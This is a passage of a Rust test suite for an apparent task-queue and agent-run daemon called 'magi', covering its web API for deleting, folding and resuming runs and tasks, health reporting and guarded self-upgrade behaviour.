7793 assert_eq!(doc.header("content-type"), Some("text/html; charset=utf-8"));
7794
7795 let sibling = fx.get(&format!("/api/questions/{id}/panel/shot.png")).await;
7796 assert_eq!(sibling.status, 200, "{}", sibling.body);
7797 assert_eq!(sibling.header("content-type"), Some("image/png"));
7798 assert_eq!(
7799 sibling.header("content-security-policy"),
7800 Some(PANEL_CSP),
7801 "the sibling route must carry the same policy as the asset route"
7802 );
7803
7804 assert_eq!(
7807 fx.head(&format!("/api/questions/{id}/panel")).await.status,
7808 200
7809 );
7810 }
7811
7812 #[test]
7813 fn runs_revision_moves_when_deleting_an_older_run() {
7814 let temp = TempDir::new().expect("tempdir");
7815 let runs = temp.path().join("runs");
7816 std::fs::create_dir_all(&runs).expect("create runs dir");
7817
7818 assert_eq!(runs_revision(&runs), 0, "empty runs has 0 revision");
7819
7820 write_run(&runs, "20260901-100000-old1", RunStatus::Merged);
7821 std::thread::sleep(Duration::from_millis(10));
7822 write_run(&runs, "20260902-100000-new2", RunStatus::Merged);
7823
7824 let rev_before = runs_revision(&runs);
7825 assert!(rev_before > 0);
7826
7827 let old_dir = runs.join("20260901-100000-old1");
7828 std::fs::remove_dir_all(&old_dir).expect("remove old run");
7829
7830 let rev_after = runs_revision(&runs);
7831 assert_ne!(
7832 rev_before, rev_after,
7833 "deleting an older run must change the revision so other clients see the deletion"
7834 );
7835 }
7836
7837 fn write_state(runs: &FsPath, state: &RunState) {
7842 let dir = runs.join(&state.id);
7843 std::fs::create_dir_all(&dir).expect("run dir");
7844 std::fs::write(
7845 dir.join("run.json"),
7846 serde_json::to_string_pretty(state).expect("serialize run"),
7847 )
7848 .expect("write run.json");
7849 }
7850
7851 #[test]
7856 fn runs_revision_moves_when_a_seat_starts_and_again_when_it_finishes() {
7857 let temp = TempDir::new().expect("tempdir");
7858 let runs = temp.path().join("runs");
7859 std::fs::create_dir_all(&runs).expect("create runs dir");
7860 let mut state = RunState::new(
7861 PathBuf::from("/repo/magi"),
7862 "main".to_owned(),
7863 "0123456789abcdef".to_owned(),
7864 "task".to_owned(),
7865 Config::default(),
7866 );
7867 state.id = "20260902-100000-c0de".to_owned();
7868 write_state(&runs, &state);
7869
7870 let rev_idle = runs_revision(&runs);
7871 std::thread::sleep(Duration::from_millis(10));
7872 state.seat_started("judge", "judge-1", std::time::Duration::from_secs(60), 0);
7873 write_state(&runs, &state);
7874 let rev_started = runs_revision(&runs);
7875 assert_ne!(
7876 rev_idle, rev_started,
7877 "a seat starting must move the revision"
7878 );
7879
7880 std::thread::sleep(Duration::from_millis(10));
7881 state.seat_finished("judge-1");
7882 write_state(&runs, &state);
7883 let rev_finished = runs_revision(&runs);
7884 assert_ne!(
7885 rev_started, rev_finished,
7886 "and clearing it again must move the revision a second time"
7887 );
7888 }
7889
7890 #[tokio::test]
7891 async fn queue_json_carries_dependency_fields_and_a_hold_clears_them() {
7892 let fx = Fixture::start().await;
7897 let q = fx.queue();
7898
7899 let mut t = Task::new(
7900 "Task".to_owned(),
7901 "Instruction".to_owned(),
7902 PathBuf::from("/repo"),
7903 Source::Human,
7904 );
7905 t.block(
7906 vec!["20260101-000000-dead".to_owned()],
7907 Some("waiting on Task 1".to_owned()),
7908 );
7909 t.answers.push(crate::queue::AnsweredQuestion {
7910 question: "Which backend?".to_owned(),
7911 answer: "SQLite".to_owned(),
7912 });
7913 q.put(&mut t).expect("put t");
7914
7915 let res = fx.get("/api/queue").await;
7916 assert_eq!(res.status, 200);
7917 let list = res.json();
7918 let view = list
7919 .as_array()
7920 .expect("array")
7921 .iter()
7922 .find(|v| v["id"] == t.id)
7923 .expect("task in list");
7924 assert_eq!(view["status_str"], "blocked");
7925 assert_eq!(
7926 view["blocked_by"],
7927 serde_json::json!(["20260101-000000-dead"])
7928 );
7929 assert_eq!(view["block_reason"], "waiting on Task 1");
7930 assert_eq!(view["answers"][0]["question"], "Which backend?");
7931 assert_eq!(view["answers"][0]["answer"], "SQLite");
7932
7933 let res = fx
7937 .post(&format!("/api/queue/{}/hold", t.short()), None)
7938 .await;
7939 assert_eq!(res.status, 200);
7940 let held = res.json();
7941 assert_eq!(held["status_str"], "held");
7942 assert_eq!(held["blocked_by"], serde_json::json!([]));
7943 assert!(held["block_reason"].is_null());
7944 assert_eq!(held["answers"][0]["answer"], "SQLite");
7945 }
7946
7947 #[tokio::test]
7948 async fn queue_json_shows_a_blocked_chain_and_its_stuck_root() {
7949 let fx = Fixture::start().await;
7950 let q = fx.queue();
7951 let mk = |title: &str| {
7952 Task::new(
7953 title.to_owned(),
7954 "Instruction".to_owned(),
7955 PathBuf::from("/repo"),
7956 Source::Human,
7957 )
7958 };
7959 let mut root = mk("root");
7960 root.hold_manual(Some("waiting".to_owned()));
7961 q.put(&mut root).unwrap();
7962 let mut mid = mk("mid");
7963 mid.block(vec![root.id.clone()], None);
7964 q.put(&mut mid).unwrap();
7965 let mut leaf = mk("leaf");
7966 leaf.block(vec![mid.id.clone()], None);
7967 q.put(&mut leaf).unwrap();
7968
7969 let list = fx.get("/api/queue").await.json();
7970 let find = |id: &str| {
7971 list.as_array()
7972 .unwrap()
7973 .iter()
7974 .find(|v| v["id"] == id)
7975 .unwrap()
7976 .clone()
7977 };
7978 let leaf_view = find(&leaf.id);
7979 assert_eq!(
7980 leaf_view["waits_on"],
7981 serde_json::json!([format!("{} (blocked → {} held)", mid.short(), root.short())])
7982 );
7983 assert_eq!(leaf_view["stuck_roots"], serde_json::json!([root.short()]));
7984 assert_eq!(
7985 find(&mid.id)["waits_on"],
7986 serde_json::json!([format!("{} (held)", root.short())])
7987 );
7988 assert_eq!(find(&root.id)["waits_on"], serde_json::json!([]));
7989 }
7990
7991 #[tokio::test]
7992 async fn delete_queue_task_deletes_file_and_guards_running_and_locked() {
7993 let fx = Fixture::start().await;
7994 let q = fx.queue();
7995
7996 let mut t1 = Task::new(
7998 "Task 1".to_owned(),
7999 "Instruction 1".to_owned(),
8000 PathBuf::from("/repo"),
8001 Source::Human,
8002 );
8003 let run_id = "20260901-000000-r111";
8004 t1.runs.push(run_id.to_owned());
8005 write_run(&fx.runs(), run_id, RunStatus::Merged);
8006 q.put(&mut t1).expect("put t1");
8007
8008 let res = fx.delete(&format!("/api/queue/{}", t1.short())).await;
8010 assert_eq!(res.status, 204);
8011 assert!(res.body.is_empty(), "204 No Content has no body");
8012 assert!(!q.path_of(&t1.id).exists(), "task file is deleted");
8013 assert!(
8014 fx.runs().join(run_id).exists(),
8015 "run directory must not be deleted when its task is deleted"
8016 );
8017
8018 let mut t2 = Task::new(
8020 "Task 2".to_owned(),
8021 "Instruction 2".to_owned(),
8022 PathBuf::from("/repo"),
8023 Source::Human,
8024 );
8025 t2.status = TaskStatus::Running;
8026 q.put(&mut t2).expect("put t2");
8027 let mut beat = crate::daemon::Status::new();
8028 beat.current = vec![crate::daemon::Current {
8029 task: t2.id.clone(),
8030 run: "20260901-000000-r222".to_owned(),
8031 }];
8032 beat.updated_at = jiff::Timestamp::now();
8033 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
8034 .expect("publish a heartbeat");
8035 let res = fx.delete(&format!("/api/queue/{}", t2.id)).await;
8036 assert_eq!(res.status, 409);
8037 assert!(
8038 res.json()["error"]
8039 .as_str()
8040 .unwrap()
8041 .contains("live daemon")
8042 );
8043 assert!(q.path_of(&t2.id).exists(), "a task in flight is kept");
8044
8045 beat.updated_at = jiff::Timestamp::now() - jiff::SignedDuration::from_secs(600);
8051 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
8052 .expect("leave a stale heartbeat");
8053 let mut t3 = Task::new(
8054 "Task 3".to_owned(),
8055 "Instruction 3".to_owned(),
8056 PathBuf::from("/repo"),
8057 Source::Human,
8058 );
8059 t3.status = TaskStatus::Running;
8060 q.put(&mut t3).expect("put t3");
8061 std::mem::forget(q.claim(&t3.id).expect("claim t3"));
8062 let res = fx.delete(&format!("/api/queue/{}", t3.id)).await;
8063 assert_eq!(res.status, 204);
8064 assert!(!q.path_of(&t3.id).exists(), "the task file is gone");
8065 assert!(
8066 q.claim(&t3.id).is_ok(),
8067 "the stale lock went with it, so the id is claimable again"
8068 );
8069
8070 let res = fx.delete("/api/queue/nonexistent").await;
8072 assert_eq!(res.status, 404);
8073 }
8074
8075 #[tokio::test]
8076 async fn delete_run_deletes_directory_and_guards_running_and_unfolded() {
8077 let fx = Fixture::start().await;
8078 let runs = fx.runs();
8079
8080 let run_id = "20260901-000000-fold";
8082 let mut state = RunState::new(
8083 PathBuf::from("/repo"),
8084 "main".to_owned(),
8085 "abc".to_owned(),
8086 "instruction".to_owned(),
8087 Config::default(),
8088 );
8089 state.id = run_id.to_owned();
8090 state.status = RunStatus::Merged;
8091 state.candidates.push(crate::run::Candidate {
8092 index: 0,
8093 label: 'A',
8094 agent: "a".to_owned(),
8095 branch: "b".to_owned(),
8096 worktree: PathBuf::from("/w"),
8097 summary: String::new(),
8098 stat: String::new(),
8099 files: 1,
8100 commits: 1,
8101 empty: false,
8102 failed: None,
8103 verified_noop: None,
8104 duration_ms: 0,
8105 folded: true,
8106 });
8107 let dir = runs.join(run_id);
8108 std::fs::create_dir_all(dir.join("artifacts")).expect("create artifacts");
8109 std::fs::write(dir.join("artifacts").join("patch.diff"), "dummy diff")
8110 .expect("write artifact");
8111 std::fs::write(dir.join("run.json"), serde_json::to_string(&state).unwrap())
8112 .expect("write run.json");
8113
8114 let res = fx.delete(&format!("/api/runs/{}", state.short())).await;
8116 assert_eq!(res.status, 204);
8117 assert!(res.body.is_empty(), "204 has no body");
8118 assert!(!dir.exists(), "run directory and artifacts must be deleted");
8119
8120 let run_running = "20260901-000000-rung";
8125 write_run(&runs, run_running, RunStatus::Prep);
8126 let mut beat = crate::daemon::Status::new();
8127 beat.current = vec![crate::daemon::Current {
8128 task: "20260901-000000-task".to_owned(),
8129 run: run_running.to_owned(),
8130 }];
8131 beat.updated_at = jiff::Timestamp::now();
8132 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
8133 .expect("publish a heartbeat");
8134 let res = fx.delete(&format!("/api/runs/{run_running}")).await;
8135 assert_eq!(res.status, 409);
8136 assert!(
8137 res.json()["error"]
8138 .as_str()
8139 .unwrap()
8140 .contains("live daemon"),
8141 "the refusal must say who is holding it"
8142 );
8143 assert!(
8144 runs.join(run_running).exists(),
8145 "a run in flight keeps its directory"
8146 );
8147
8148 let run_unfolded = "20260901-000000-unfd";
8150 let mut state2 = RunState::new(
8151 PathBuf::from("/repo"),
8152 "main".to_owned(),
8153 "abc".to_owned(),
8154 "instruction".to_owned(),
8155 Config::default(),
8156 );
8157 state2.id = run_unfolded.to_owned();
8158 state2.status = RunStatus::Ready;
8159 state2.candidates.push(crate::run::Candidate {
8160 index: 0,
8161 label: 'A',
8162 agent: "a".to_owned(),
8163 branch: "b".to_owned(),
8164 worktree: PathBuf::from("/w"),
8165 summary: String::new(),
8166 stat: String::new(),
8167 files: 1,
8168 commits: 1,
8169 empty: false,
8170 failed: None,
8171 verified_noop: None,
8172 duration_ms: 0,
8173 folded: false,
8174 });
8175 let dir2 = runs.join(run_unfolded);
8176 std::fs::create_dir_all(&dir2).expect("create dir2");
8177 std::fs::write(
8178 dir2.join("run.json"),
8179 serde_json::to_string(&state2).unwrap(),
8180 )
8181 .expect("write run.json");
8182
8183 let res = fx.delete(&format!("/api/runs/{run_unfolded}")).await;
8184 assert_eq!(res.status, 409);
8185 assert!(res.json()["error"].as_str().unwrap().contains("magi fold"));
8186 assert!(dir2.exists(), "unfolded run directory is kept");
8187
8188 let res = fx.delete("/api/runs/nonexistent").await;
8190 assert_eq!(res.status, 404);
8191 }
8192
8193 #[test]
8194 fn web_ui_delete_contract_in_front_end() {
8195 assert!(APP_JS.contains("deleteRun:"));
8197 assert!(APP_JS.contains("deleteTask:"));
8198
8199 let run_cards_slice = &APP_JS[APP_JS.find("function createRunCard").unwrap()
8201 ..APP_JS.find("function renderRuns").unwrap()];
8202 assert!(!run_cards_slice.to_lowercase().contains("delete"));
8203
8204 assert!(APP_JS.contains("renderRunDelete"));
8206 assert!(APP_JS.contains("runDeleteReason"));
8207 assert!(APP_JS.contains("magi fold"));
8208 assert!(APP_JS.contains("This run is still in flight and cannot be deleted."));
8209
8210 assert!(APP_JS.contains("cancel.focus"));
8212 assert!(APP_JS.contains("armedRunDelete"));
8213 assert!(APP_JS.contains("armedDelete"));
8214
8215 assert!(APP_JS.contains("disabled: status === \"running\""));
8217 }
8218
8219 #[test]
8239 fn every_ref_a_run_card_uses_is_one_its_builder_published() {
8240 let build = APP_JS
8241 .find("function createRunCard")
8242 .expect("createRunCard exists");
8243 let update = APP_JS
8244 .find("function updateRunCard")
8245 .expect("updateRunCard exists");
8246 let end = APP_JS
8247 .find("function renderRuns")
8248 .expect("renderRuns exists");
8249
8250 let builder = &APP_JS[build..update];
8252 let open = builder.find("refs = {").expect("createRunCard sets refs");
8253 let literal = &builder[open + "refs = {".len()..];
8254 let close = literal.find('}').expect("the refs literal is closed");
8255 let published: HashSet<&str> = literal[..close]
8256 .split(',')
8257 .filter_map(|entry| entry.split(':').next())
8259 .map(str::trim)
8260 .filter(|name| !name.is_empty())
8261 .collect();
8262 assert!(
8263 published.len() > 5,
8264 "the refs literal did not parse into names: {published:?}"
8265 );
8266
8267 let mut used: Vec<&str> = Vec::new();
8270 let updaters = &APP_JS[update..end];
8271 for (at, _) in updaters.match_indices("r.") {
8272 let before = updaters[..at].chars().next_back();
8275 if before.is_some_and(|c| c.is_alphanumeric() || c == '_' || c == '$' || c == '.') {
8276 continue;
8277 }
8278 let rest = &updaters[at + 2..];
8279 let len = rest
8280 .find(|c: char| !(c.is_alphanumeric() || c == '_' || c == '$'))
8281 .unwrap_or(rest.len());
8282 if len > 0 {
8283 used.push(&rest[..len]);
8284 }
8285 }
8286 assert!(
8287 used.len() > 5,
8288 "no `r.<name>` uses were found; the updaters must have been rewritten: {used:?}"
8289 );
8290
8291 let missing: Vec<&str> = used
8292 .iter()
8293 .copied()
8294 .filter(|name| !published.contains(name))
8295 .collect();
8296 assert!(
8297 missing.is_empty(),
8298 "a run card's updater reaches for {missing:?}, which `createRunCard` \
8299 never put in `refs` - every card will throw and the list will \
8300 render empty under a count line that says otherwise. Published: \
8301 {published:?}"
8302 );
8303 }
8304
8305 #[tokio::test]
8306 async fn folding_from_the_phone_reports_what_it_removed() {
8307 let fx = Fixture::start().await;
8308 let runs = fx.runs();
8309
8310 let id = "20260901-000000-fold";
8314 write_run(&runs, id, RunStatus::Stalled);
8315 let res = fx.post(&format!("/api/runs/{id}/fold"), None).await;
8316 assert_eq!(res.status, 200);
8317 assert_eq!(res.json()["removed_count"], 0);
8318 assert_eq!(res.json()["run"], id);
8319 assert!(
8320 runs.join(id).exists(),
8321 "a fold keeps the run's record; only the worktrees go"
8322 );
8323 }
8324
8325 #[tokio::test]
8326 async fn folding_an_unreadable_run_falls_back_to_removing_it_wholesale() {
8327 let fx = Fixture::start().await;
8328 let runs = fx.runs();
8329 let wt = fx.home.path().join("wt").join("magi").join("dead");
8330 let id = "20260901-000000-dead";
8331 std::fs::create_dir_all(runs.join(id)).expect("run dir");
8332 std::fs::write(runs.join(id).join("run.json"), "not json").expect("garbage state");
8333 std::fs::create_dir_all(&wt).expect("worktree dir");
8334
8335 let res = fx.post(&format!("/api/runs/{id}/fold"), None).await;
8336 assert_eq!(res.status, 200, "{}", res.body);
8337 assert!(
8338 res.json()["removed_count"].as_u64().unwrap() > 0,
8339 "the worktree this build could not read a state for still went"
8340 );
8341 assert!(
8342 !runs.join(id).exists(),
8343 "an unreadable run has no candidate list to fold selectively, so \
8344 the whole record goes - same as `magi fold` on the CLI"
8345 );
8346 }
8347
8348 #[tokio::test]
8349 async fn deleting_an_unreadable_run_removes_it_wholesale() {
8350 let fx = Fixture::start().await;
8351 let runs = fx.runs();
8352 let wt = fx.home.path().join("wt").join("magi").join("gone");
8353 let id = "20260901-000000-gone";
8354 std::fs::create_dir_all(runs.join(id)).expect("run dir");
8355 std::fs::write(runs.join(id).join("run.json"), "not json").expect("garbage state");
8356 std::fs::create_dir_all(&wt).expect("worktree dir");
8357
8358 let res = fx.delete(&format!("/api/runs/{id}")).await;
8359 assert_eq!(res.status, 204, "{}", res.body);
8360 assert!(!runs.join(id).exists(), "the broken record is gone");
8361 assert!(!wt.exists(), "its worktree is gone too");
8362 }
8363
8364 #[tokio::test]
8365 async fn folding_is_refused_while_a_daemon_is_working_on_the_run() {
8366 let fx = Fixture::start().await;
8367 let runs = fx.runs();
8368 let id = "20260901-000000-live";
8369 write_run(&runs, id, RunStatus::Implementing);
8370
8371 let mut beat = crate::daemon::Status::new();
8372 beat.current = vec![crate::daemon::Current {
8373 task: "20260901-000000-task".to_owned(),
8374 run: id.to_owned(),
8375 }];
8376 beat.updated_at = jiff::Timestamp::now();
8377 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
8378 .expect("publish a heartbeat");
8379
8380 let res = fx.post(&format!("/api/runs/{id}/fold"), None).await;
8381 assert_eq!(res.status, 409);
8382 assert!(
8383 res.json()["error"]
8384 .as_str()
8385 .unwrap()
8386 .contains("live daemon"),
8387 "folding under a running agent would pull its worktree away"
8388 );
8389 }
8390
8391 #[tokio::test]
8392 async fn resume_is_refused_unless_the_run_stopped_somewhere_it_can_continue() {
8393 let fx = Fixture::start().await;
8394 let runs = fx.runs();
8395
8396 for (status, word) in [
8402 (RunStatus::Merged, "merged"),
8403 (RunStatus::Ready, "ready"),
8404 (RunStatus::Failed, "failed"),
8405 ] {
8406 let id = format!("20260901-000000-{}", &word[..4]);
8407 write_run(&runs, &id, status);
8408 let res = fx.post(&format!("/api/runs/{id}/resume"), None).await;
8409 assert_eq!(res.status, 409, "{word} must not be resumable");
8410 let err = res.json()["error"].as_str().unwrap().to_owned();
8411 assert!(err.contains(word), "the refusal names the status: {err}");
8412 }
8413
8414 let mid = "20260901-000000-midf";
8419 write_run(&runs, mid, RunStatus::Reviewing);
8420 let res = fx.post(&format!("/api/runs/{mid}/resume"), None).await;
8421 assert_eq!(res.status, 202, "an interrupted run is resumable");
8422 }
8423
8424 #[tokio::test]
8425 async fn resume_is_refused_while_the_loop_is_running() {
8426 let fx = Fixture::start().await;
8427 let runs = fx.runs();
8428 let stalled = "20260901-000000-stal";
8429 write_run(&runs, stalled, RunStatus::Stalled);
8430
8431 let mut beat = crate::daemon::Status::new();
8435 beat.current = vec![crate::daemon::Current {
8436 task: "20260901-000000-task".to_owned(),
8437 run: "20260901-000000-othr".to_owned(),
8438 }];
8439 beat.updated_at = jiff::Timestamp::now();
8440 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
8441 .expect("publish a heartbeat");
8442
8443 let res = fx.post(&format!("/api/runs/{stalled}/resume"), None).await;
8444 assert_eq!(res.status, 409);
8445 let err = res.json()["error"].as_str().unwrap().to_owned();
8446 assert!(err.contains("othr"), "it names what the loop is on: {err}");
8447 assert!(err.contains("stop it first"), "{err}");
8448 }
8449
8450 #[test]
8451 fn a_run_cannot_be_resumed_twice_at_once() {
8452 let home = TempDir::new().expect("temp home");
8453 let ui = Ui::new(
8454 Queue::at(home.path().join("queue")),
8455 Questions::at(home.path().join("questions")),
8456 Talks::at(home.path().join("talks")),
8457 home.path().join("runs"),
8458 home.path().to_path_buf(),
8459 PathBuf::from("/repo"),
8460 )
8461 .with_worktrees_root(home.path().join("wt"));
8462 let first = ui.begin_resume("20260901-000000-once").expect("claimed");
8463 let again = ui.begin_resume("20260901-000000-once");
8464 assert!(again.is_err(), "a second tap must not start a second graph");
8465 drop(first);
8466 assert!(
8467 ui.begin_resume("20260901-000000-once").is_ok(),
8468 "and the claim is released when the attempt ends"
8469 );
8470 }
8471
8472 #[test]
8473 fn talk_thinking_tracks_only_its_held_turn_claim() {
8474 let home = TempDir::new().expect("temp home");
8475 let ui = Ui::new(
8476 Queue::at(home.path().join("queue")),
8477 Questions::at(home.path().join("questions")),
8478 Talks::at(home.path().join("talks")),
8479 home.path().join("runs"),
8480 home.path().to_path_buf(),
8481 PathBuf::from("/repo"),
8482 )
8483 .with_worktrees_root(home.path().join("wt"));
8484 let id = "20260901-000000-once";
8485
8486 assert!(!ui.is_thinking(id), "an unclaimed talk is not thinking");
8487 let turn = ui.begin_talk_turn(id).expect("claim turn");
8488 assert!(ui.is_thinking(id), "the held guard is reported as thinking");
8489 assert!(
8490 !ui.is_thinking("20260901-000000-other"),
8491 "one talk's turn does not make another talk busy"
8492 );
8493 drop(turn);
8494 assert!(!ui.is_thinking(id), "dropping the guard releases thinking");
8495 }
8496
8497 #[tokio::test]
8498 async fn an_upgrade_is_refused_when_the_loop_belongs_to_another_process() {
8499 let fx = Fixture::start().await;
8500 let mut beat = crate::daemon::Status::new();
8504 beat.pid = 4321;
8505 beat.updated_at = jiff::Timestamp::now();
8506 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
8507 .expect("publish a heartbeat");
8508
8509 let res = fx.post("/api/upgrade", None).await;
8510 assert_eq!(res.status, 409);
8511 let err = res.json()["error"].as_str().unwrap().to_owned();
8512 assert!(err.contains("4321"), "the refusal names the owner: {err}");
8513 assert!(err.contains("old one against the same queue"), "{err}");
8514 }
8515
8516 #[test]
8523 fn recheck_never_spawns_when_checking_is_off_or_killed_by_env() {
8524 assert!(!should_spawn_recheck(&crate::config::Update {
8525 mode: UpdateMode::Off,
8526 interval: None,
8527 }));
8528
8529 unsafe {
8532 std::env::set_var(crate::updater::NO_AUTOUPDATE_ENV, "1");
8533 }
8534 let killed = should_spawn_recheck(&crate::config::Update {
8535 mode: UpdateMode::Notify,
8536 interval: None,
8537 });
8538 unsafe {
8539 std::env::remove_var(crate::updater::NO_AUTOUPDATE_ENV);
8540 }
8541 assert!(
8542 !killed,
8543 "MAGI_NO_AUTOUPDATE must stop the periodic recheck, not just the \
8544 one-time startup check"
8545 );
8546
8547 assert!(should_spawn_recheck(&crate::config::Update {
8548 mode: UpdateMode::Notify,
8549 interval: None,
8550 }));
8551 }
8552
8553 #[test]
8559 fn recheck_poll_period_tracks_a_short_configured_interval() {
8560 let short = crate::config::Update {
8561 mode: UpdateMode::Notify,
8562 interval: Some("1m".to_owned()),
8563 };
8564 let period = recheck_poll_period(&short);
8565 assert!(
8566 period <= Duration::from_secs(30),
8567 "a one-minute interval must wake the task far sooner than the \
8568 default ceiling, or the deck would not notice within the \
8569 interval the operator configured: got {period:?}"
8570 );
8571
8572 let default = crate::config::Update {
8573 mode: UpdateMode::Notify,
8574 interval: None,
8575 };
8576 assert_eq!(
8577 recheck_poll_period(&default),
8578 UPDATE_RECHECK_POLL_MAX,
8579 "the default day-long interval should poll at the (capped) \
8580 ceiling rather than needlessly often"
8581 );
8582 }
8583
8584 #[test]
8592 fn recheck_skips_the_network_before_the_interval_elapses() {
8593 let dir = TempDir::new().expect("temp dir");
8594 let path = dir.path().join("state.json");
8595 let state = kaishin::UpdateCheckState {
8596 last_checked_unix: jiff::Timestamp::now().as_second() as u64,
8597 last_known_latest: None,
8598 last_known_url: None,
8599 };
8600 kaishin::save_check_state(&path, &state).expect("seed a just-checked state");
8601
8602 let checker = crate::updater::Checker::for_test(Duration::from_secs(24 * 60 * 60), path);
8603 assert!(
8604 !update_recheck_due(&checker, None),
8605 "a check made moments ago must not be repeated before the \
8606 configured interval elapses"
8607 );
8608 }
8609
8610 #[test]
8616 fn recheck_defers_to_an_upgrade_already_in_flight() {
8617 let dir = TempDir::new().expect("temp dir");
8618 let path = dir.path().join("state.json");
8619 let checker = crate::updater::Checker::for_test(Duration::from_secs(60 * 60), path);
8620 let progress = crate::updater::Progress::new("0.8.0".to_owned(), "v0.9.0".to_owned());
8621
8622 assert!(
8623 !update_recheck_due(&checker, Some(&progress)),
8624 "a recheck must not run while an upgrade this deck started is \
8625 still moving"
8626 );
8627 }
8628
8629 #[tokio::test]
8630 async fn an_upgrade_is_refused_by_the_no_autoupdate_kill_switch() {
8631 unsafe {
8643 std::env::set_var(crate::updater::NO_AUTOUPDATE_ENV, "1");
8644 }
8645 let fx = Fixture::start().await;
8646 let res = fx.post("/api/upgrade", None).await;
8647 unsafe {
8648 std::env::remove_var(crate::updater::NO_AUTOUPDATE_ENV);
8649 }
8650 assert_eq!(res.status, 200, "not 202: nothing was set in motion");
8651 let body = res.json();
8652 assert!(body["to"].is_null(), "there was no release to move to");
8653 assert!(body["parked"].is_null(), "and nothing was parked");
8654 assert!(
8655 body["detail"]
8656 .as_str()
8657 .unwrap()
8658 .contains("disabled by MAGI_NO_AUTOUPDATE"),
8659 "{body:?}"
8660 );
8661 }
8662
8663 #[tokio::test]
8664 async fn an_upgrade_with_nothing_to_install_changes_nothing() {
8665 let repo = TempDir::new().expect("repo dir");
8681 std::fs::write(repo.path().join("magi.toml"), "[update]\nmode = \"off\"\n")
8682 .expect("write magi.toml");
8683 let fx = Fixture::with_repo(repo.path().to_path_buf()).await;
8684
8685 let res = fx.post("/api/upgrade", None).await;
8691 assert_eq!(res.status, 200, "not 202: nothing was set in motion");
8692 let body = res.json();
8693 assert!(body["to"].is_null(), "there was no release to move to");
8694 assert!(body["parked"].is_null(), "and nothing was parked");
8695 assert!(
8696 body["detail"]
8697 .as_str()
8698 .unwrap()
8699 .contains("nothing restarted"),
8700 "{body:?}"
8701 );
8702 }
8703
8704 #[tokio::test]
8705 async fn health_reports_the_running_version_and_no_pending_upgrade_by_default() {
8706 let repo = TempDir::new().expect("repo dir");
8711 std::fs::write(repo.path().join("magi.toml"), "[update]\nmode = \"off\"\n")
8712 .expect("write magi.toml");
8713 let fx = Fixture::with_repo(repo.path().to_path_buf()).await;
8714
8715 let health = fx.get("/api/health").await.json();
8716 assert_eq!(health["version"], env!("CARGO_PKG_VERSION"));
8717 assert_eq!(
8718 health["update"]["available"], false,
8719 "checking is off, which reads as \"unknown\", not \"none\""
8720 );
8721 assert!(health["update"]["to"].is_null());
8722 assert!(
8723 health["upgrade"].is_null(),
8724 "nothing has ever asked this deck to upgrade"
8725 );
8726 }
8727
8728 #[tokio::test]
8729 async fn health_reports_a_parked_upgrade_and_what_it_is_waiting_on() {
8730 let fx = Fixture::start().await;
8731 write_run(&fx.runs(), "20260905-000000-cd51", RunStatus::Implementing);
8732
8733 let mut progress = crate::updater::Progress::new("0.5.1".to_owned(), "0.5.2".to_owned());
8734 progress.parked_run = Some("20260905-000000-cd51".to_owned());
8735 progress.advance(crate::updater::Stage::Parking);
8736 crate::updater::write_progress(fx.home.path(), &progress).expect("write upgrade.json");
8737
8738 let health = fx.get("/api/health").await.json();
8739 assert_eq!(health["upgrade"]["stage"], "parking");
8740 assert_eq!(health["upgrade"]["from"], "0.5.1");
8741 assert_eq!(health["upgrade"]["to"], "0.5.2");
8742 let waiting_on = health["upgrade"]["waiting_on"]
8743 .as_str()
8744 .expect("waiting_on is set while parking a known run");
8745 assert!(waiting_on.contains("cd51"), "{waiting_on}");
8746 assert!(waiting_on.contains("implementing"), "{waiting_on}");
8747 }
8748
8749 #[tokio::test]
8750 async fn health_reports_a_finished_upgrade_with_no_waiting_on() {
8751 let fx = Fixture::start().await;
8752 let mut progress = crate::updater::Progress::new("0.5.1".to_owned(), "0.5.2".to_owned());
8753 progress.advance(crate::updater::Stage::Done);
8754 crate::updater::write_progress(fx.home.path(), &progress).expect("write upgrade.json");
8755
8756 let health = fx.get("/api/health").await.json();
8757 assert_eq!(health["upgrade"]["stage"], "done");
8758 assert!(
8759 health["upgrade"]["waiting_on"].is_null(),
8760 "nothing to wait on once it is done"
8761 );
8762 }
8763
8764 #[tokio::test]
8765 async fn hand_over_advances_the_upgrade_progress_through_parking_and_restarting() {
8766 let home = TempDir::new().expect("temp home");
8767 let runs = home.path().join("runs");
8768 std::fs::create_dir_all(&runs).expect("runs dir");
8769 let ui = Ui::new(
8770 Queue::at(home.path().join("queue")),
8771 Questions::at(home.path().join("questions")),
8772 Talks::at(home.path().join("talks")),
8773 runs,
8774 home.path().to_path_buf(),
8775 PathBuf::from("/repo/magi"),
8776 )
8777 .with_launch(launch_idle);
8778 let looping = ui.looping();
8779 let listener = tokio::net::TcpListener::bind((Ipv4Addr::LOCALHOST, 0))
8780 .await
8781 .expect("bind loopback");
8782 let served = tokio::spawn(axum::serve(listener, ui.router()).into_future());
8783
8784 let progress = crate::updater::Progress::new("0.5.1".to_owned(), "0.5.2".to_owned());
8785 crate::updater::write_progress(home.path(), &progress).expect("seed progress");
8786
8787 hand_over(home.path(), &looping, served, || Ok(()))
8788 .await
8789 .expect("hand over");
8790
8791 let after = crate::updater::read_progress(home.path()).expect("progress on disk");
8792 assert_eq!(
8793 after.stage,
8794 crate::updater::Stage::Restarting,
8795 "hand_over owns the record through parking and up to restarting; \
8796 the successor is what finishes it"
8797 );
8798 }
8799
8800 #[test]
8801 fn the_upgrade_button_arms_before_it_restarts_anything() {
8802 assert!(APP_JS.contains("upgrade: \"/api/upgrade\""));
8805 assert!(APP_JS.contains("Replace the binary and restart?"));
8806 assert!(APP_JS.contains("function confirmed("));
8807 assert!(APP_JS.contains("show(upgradeBtn, !foreign && update.available)"));
8812 assert!(
8816 APP_JS.contains("Parking, then restarting"),
8817 "the button says what it is waiting for"
8818 );
8819 assert!(APP_JS.contains("if (!out.to)"));
8822 }
8823
8824 #[test]
8825 fn stopping_the_loop_arms_but_starting_does_not() {
8826 assert!(APP_JS.contains("Finish the run(s) in flight, then stop claiming?"));
8829 assert!(APP_JS.contains("Stop claiming new tasks? Nothing is in flight."));
8830 assert!(APP_JS.contains("confirmed(button, question)"));
8831 assert!(!APP_JS.contains("setText(btn, \"Update & restart\");\n }\n }, 6000)"));
